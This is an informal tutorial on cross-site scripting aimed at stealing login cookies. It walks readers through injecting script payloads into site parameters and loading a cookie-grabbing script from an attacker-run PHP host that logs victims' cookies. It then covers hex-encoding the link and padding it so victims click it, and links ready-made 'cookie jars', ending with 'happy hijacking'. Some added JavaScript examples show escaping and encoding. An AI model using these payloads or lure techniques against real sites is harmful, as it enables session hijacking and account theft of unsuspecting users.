
XSS tut

by vol

Well, what is an XSS attack? It is the art of running scripts in your victim's browser. With the right knowledge you can run almost any script in their browser; most of the time XSS is used for stealing cookies.
Cookies are bits of information used by web servers / web sites to check who you are on that site. If you are a guest it will set a cookie saying you are a guest; when you log in it will replace that cookie with the cookie from your login, which will have your login ID and, sometimes, if it is a forum, an MD5 hash of your password (hashed, not encrypted, so the server can compare it against the database but cannot read the password back out of it), plus whatever else the site can think of using to make sure you are who you say you are, like session IDs that expire after a time limit the server sets, such as 10 or 60 minutes.
The cookie has named sections, so when the server checks who you are it reads bits of data like the ID and, if it is a forum, the MD5 hash. Most of the time a forum will be using the default cookie prefix, like nukeevo_ID and so on, but the forum admin can change that.
What is a user ID? If you are the first to sign up to a forum your ID will be ONE, because you will be the first row in the SQL table (I will talk about the SQL tables later). The admin account is nearly always ID 1 or 2, because of course the admin had to make the first account in order to configure the forum.
Now, when looking for this type of attack there are a few ways to go about it. First, get the hacker's point of view: the goal is to run that script no matter what, looking at every way he or she can find. On MySpace, attackers were using Flash files, not to steal cookies (because MySpace filters JavaScript) but to redirect to a fake login page; the files for this can be found in downloads. That was using .swf files, but the newest one for MySpace is using .mov files, i.e. QuickTime files, to get to a URL which would be your fake login. A good FREE server to host and run PHP files is www.php1h.com. You would upload your cookie stealing scripts to that server so you can send the user's cookie to that site and view it in the log.
OK, how you could set it up would be:

http://evilhacker.php1h.com/cookiestealer.php = this is the backbone; it takes the cookie from the JavaScript we run, called xss.js
http://evilhacker.php1h.com/log.php = this is the log where the cookie ends up after cookiestealer.php has sent it to the log
www.evilhacker.php1h.com/xss.js = this is the JavaScript that gives the cookie to cookiestealer.php

: finidng xss attacks :


Well, the first way is viewing the site and looking around for any input boxes, and then viewing the source of that site for the name of the input box.

When looking for an XSS you need to make sure you look at the URL in the URL bar; you might see stuff that looks like www.site.com/blah.html or .php or .cfm or .jsp. Make sure it has the full URL, and if it has stuff after a ? mark, add yours at the end of the URL by using a &, like this:

www.site.com/page.php?MID=2&(NAME_OF_INPUT_BOX)=(script)

So if the input box was called milk (for some reason, I don't know why, but just for this tut let's say that) and the script will just print the word Xss on screen:

www.site.com/page.php?MID=2&MILK="><script>alert("Xss")</script>

The "> is there because it tells the input box to stop reading at that point (it closes the value attribute and the tag), and then the browser runs the JavaScript. If the input box was called cat it would look like this:

www.site.com/page.php?MID=2&cat="><script>alert("Xss")</script>
So go around a site looking for any type of input box; sometimes I find that if a site has a send-to-a-friend feature, that email box works.
After you have found one, i.e. you get a pop-up with the word Xss in it, view the source and look for the word Xss inside an input box. The basic syntax for how it will look is:

<input type="hidden" name="milk" value="" />

You can see from there how to make the URL, which I will talk about at the end. (Match the name exactly as it appears in the source: PHP reads query parameters case-sensitively, so milk and MILK are different parameters.) So after finding an XSS that you are able to run in your browser, you want to start running the cookie grabbing scripts in your browser; they will look like this:

www.site.com/page.php?MID=2&MILK="><script src="http://evilhacker.php1h.com/xss.js"></script>
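The following is an added example, not code from the original tutorial, showing what is happening on the server side of the milk hidden input: a hypothetical render function that drops the query parameter straight into the value attribute (the bug the tutorial is exploiting), the same function with the attribute escaped (the fix), and a rough stand-in for the "view source and look for Xss" check. Only the input tag and the alert payload come from the tutorial; renderVulnerable, renderSafe, escapeHtml and reflectedUnescaped are my own names.

```javascript
// Added example, not code from the original tutorial. Models the page the
// tutorial probes: page.php reflects the "milk" query parameter into a
// hidden input. Function names and the escaping routine are hypothetical.

// Vulnerable rendering: the raw parameter lands inside value="...".
// A value starting with "> closes the attribute and the tag, and whatever
// follows (here a <script> block) is parsed as new markup by the browser.
function renderVulnerable(milk) {
  return '<input type="hidden" name="milk" value="' + milk + '" />';
}

// Fix: escape the characters that have meaning in HTML text and attributes
// before the value goes into the attribute. The quote can no longer close
// the attribute and the angle brackets can no longer open a tag.
function escapeHtml(s) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return String(s).replace(/[&<>"']/g, (c) => map[c]);
}

function renderSafe(milk) {
  return '<input type="hidden" name="milk" value="' + escapeHtml(milk) + '" />';
}

// The tutorial's "view source" step as a check: the reflection is only
// exploitable if the probe comes back with its quote and angle brackets
// untouched. Crude, but it is the question a scanner asks: does the
// canary survive verbatim in the response?
function reflectedUnescaped(html, probe) {
  return html.includes(probe);
}

// Constructed sample input: the tutorial's alert payload.
const probe = '"><script>alert("Xss")</script>';

console.log(renderVulnerable(probe));
// <input type="hidden" name="milk" value=""><script>alert("Xss")</script>" />
console.log(renderSafe(probe));
// <input type="hidden" name="milk" value="&quot;&gt;&lt;script&gt;alert(&quot;Xss&quot;)&lt;/script&gt;" />
console.log('vulnerable reflects probe:', reflectedUnescaped(renderVulnerable(probe), probe)); // true
console.log('fixed reflects probe:', reflectedUnescaped(renderSafe(probe), probe)); // false
```

The same probe against the escaped page comes back with every dangerous character entity-encoded, so there is nothing for the browser to execute; that is the whole difference between the page the tutorial is looking for and one that is not affected.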
If you sent someone that link in an email or on MSN it would run in their browser and execute that JavaScript to steal their cookies from site.com, so if you found an XSS in msn.com you would have the cookies from msn.com. (One caveat: a cookie the site sets with the HttpOnly flag is not visible to document.cookie, so a script like this cannot read it.) But you might ask yourself, how do I swap my cookies? Well, if you are using Firefox there is an add-on you can install called Cookie Editor, and then you can edit your cookies; using IE I am sure you can edit them in the temporary internet files or something, but your best bet is FF (Firefox). Just remember that when you steal the cookies they won't all be one long string; they should be broken up into names like UID and others, but you will have to work that out for yourself.
Sending the link to a victim can be hard work sometimes. If someone sent you a link that looked like this:

www.site.com/page.php?MID=2&MILK="><script src="http://evilhacker.php1h.com/xss.js"></script>

I wouldn't click it. But :P if you encoded some of the characters in that URL into hex (percent-encoding, %XX where XX is the ASCII code of the character) using this table:

[img]http://62.31.49.95/asciifull.gif[/img]

you could encode it to look something like this:

%22%3E%3Cscript%20src=%22http://evilhacker.php1h.com/xss.js%22%3E%3C/script%3E

= this is the script encoded in hex (" is %22, > is %3E, < is %3C and the space is %20); the browser and the server decode it back before the page ever sees it, so it runs exactly the same.
Would you click that instead? And to send it through MSN you might want to add another & at the end and fill it with junk, like:

www.site.com/page.php?MID=2&MILK=%22%3E%3Cscript%20src=%22http://evilhacker.php1h.com/xss.js%22%3E%3C/script%3E&mk=12

That would just make the messenger think it needs to include the whole link, right up to the end; the server parses mk=12 as a separate parameter and ignores it. There are other ways, like using .gif images to run the script on the site, but that's another story.
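As an added example (mine, not the tutorial's), here is the hex step done in code: a small encoder that percent-encodes only the quote, angle brackets and space (the same characters the tutorial hides), a link builder that appends the junk parameter, and a check with Node's built-in URL parser that the page still receives the exact original payload. The host names, page and parameter names follow the tutorial; hexEncodeMarkup, buildLink and paramSeenByServer are hypothetical names.

```javascript
// Added example, not code from the original tutorial. Shows that the
// hex-encoded link and the plain link deliver the same parameter value.
// Names of the functions are hypothetical; hosts and parameters follow
// the tutorial.

// Encode only the characters that make the link look like an injection.
// Letters, '=', and the URL of the script stay readable, as in the
// tutorial's own example. Each character in the set becomes %XX.
function hexEncodeMarkup(s) {
  return s.replace(/["<>' ]/g, (c) =>
    '%' + c.charCodeAt(0).toString(16).toUpperCase().padStart(2, '0'));
}

// Build the full link: the page, the existing MID parameter, the encoded
// payload, and optionally the junk "&mk=12" tail the tutorial suggests.
function buildLink(paramName, payload, padding) {
  const base = 'http://www.site.com/page.php?MID=2&' + paramName + '=';
  return base + hexEncodeMarkup(payload) + (padding ? '&' + padding : '');
}

// What the server sees after URL decoding. Only the first '=' in each
// pair separates name from value, so the '=' inside src="..." stays part
// of the value, and the junk after the extra '&' is a separate parameter.
function paramSeenByServer(link, paramName) {
  return new URL(link).searchParams.get(paramName);
}

// Constructed sample input: the tutorial's script-include payload.
const payload = '"><script src="http://evilhacker.php1h.com/xss.js"></script>';
const link = buildLink('MILK', payload, 'mk=12');

console.log(link);
console.log('MILK as decoded by the server:', paramSeenByServer(link, 'MILK'));
console.log('junk parameter:', paramSeenByServer(link, 'mk')); // 12
console.log('round-trips:', decodeURIComponent(hexEncodeMarkup(payload)) === payload); // true
```

The point of the check is the other side of the coin for a defender: filtering on the literal characters `<script` in the raw query string is useless, because the server-side decoder hands the application the same `<script>` tag either way. Any filter has to run on the decoded value.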
Well, that's it for now, hope you enjoyed the read.
VOl :v60-hackers:
:info:
I have set up some cookie jars for the people too lazy to make their own:
http://v60.php1h.com/cookiejar/xss.js
http://v60.php1h.com/cookiejar/log.php
happy hijacking
